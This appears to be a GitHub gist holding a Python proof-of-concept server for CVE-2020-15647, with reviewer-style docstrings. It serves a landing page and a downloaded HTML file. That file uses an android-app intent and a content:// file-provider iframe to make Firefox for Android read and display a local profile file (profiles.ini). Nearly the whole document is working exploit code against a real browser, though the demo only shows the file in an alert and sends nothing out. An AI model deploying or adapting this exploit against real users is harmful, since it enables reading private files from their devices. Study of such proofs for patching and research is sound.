
@kanytu

kanytu/server.py Secret

Created Nov 15, 2020
CVE-2020-15647 PoC
from http.server import HTTPServer, BaseHTTPRequestHandler
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    """Serve the two pages of the CVE-2020-15647 demonstration.

    A request whose path contains "/file" receives the HTML returned by
    get_file_html() as a download named profiles.ini. Every other request
    receives a landing page that embeds that download in an iframe and,
    after 1.5 seconds, navigates to an android-app:// intent URI that refers
    to the downloaded file with type text/html.

    NOTE(review): the demo only displays the fetched text with alert(); it
    sends nothing back to this server. The weakness being shown lies in the
    browser, not in this handler, so remediation is a browser release that
    carries the vendor fix (the fixed version is not stated on this page).
    """

    def get_file_html(self):
        """Return the HTML document that is served as the downloaded file.

        The document holds an iframe whose src is a content:// URI under the
        Firefox file provider (the profile's profiles.ini). The iframe's
        onload handler waits 1.5 seconds, re-requests window.location with
        XMLHttpRequest and shows the response text in an alert().
        """
        # The literal starts and ends with a newline; it is sent unchanged.
        downloaded_page = """
<!DOCTYPE html>
<html>
<script>
function start() {
setTimeout(function() {
var xmlHttp = new XMLHttpRequest();
xmlHttp.onreadystatechange = function() {
if (this.readyState == 4) {
alert(xmlHttp.responseText);
}
};
xmlHttp.open("GET", window.location, true);
xmlHttp.send();
}, 1500);
}
</script>
<iframe id="my_iframe" src="content://org.mozilla.firefox.fileprovider/root/data/user/0/org.mozilla.firefox/files/mozilla/profiles.ini" onload="start()"></iframe>
</html>
"""
        return downloaded_page

    def do_GET(self):
        """Answer every GET with status 200 and one of the two demo pages.

        Routing is a substring test, so "/file" anywhere in the request path
        (query string included) selects the download response.
        """
        if "/file" not in self.path:
            # Landing page: sent without a Content-Type header.
            self.send_response(200)
            self.end_headers()
            landing_page = b"""
<html>
<script>
setTimeout(function () {
window.location.href = 'android-app://org.mozilla.firefox/content/org.mozilla.firefox.fileprovider/root/sdcard/Download/profiles.ini#Intent;type=text/html;end';
}, 1500);
</script>
<iframe src="file"></iframe>
</html>
"""
            self.wfile.write(landing_page)
            return

        # Download response: octet-stream plus an attachment disposition make
        # the browser save the HTML to disk as profiles.ini instead of
        # rendering it from this origin.
        self.send_response(200)
        download_headers = (
            ("Content-Type", "application/octet-stream"),
            ("content-disposition", "attachment; filename=profiles.ini"),
        )
        for header_name, header_value in download_headers:
            self.send_header(header_name, header_value)
        self.end_headers()
        payload = self.get_file_html().encode()
        self.wfile.write(payload)
# Listen on the loopback name only: the demo pages are served to clients on
# this host, port 8080, and the socket is not bound to an external interface.
httpd = HTTPServer(
    server_address=('localhost', 8080),
    RequestHandlerClass=SimpleHTTPRequestHandler,
)
# Blocks and handles requests one at a time until the process is interrupted.
httpd.serve_forever()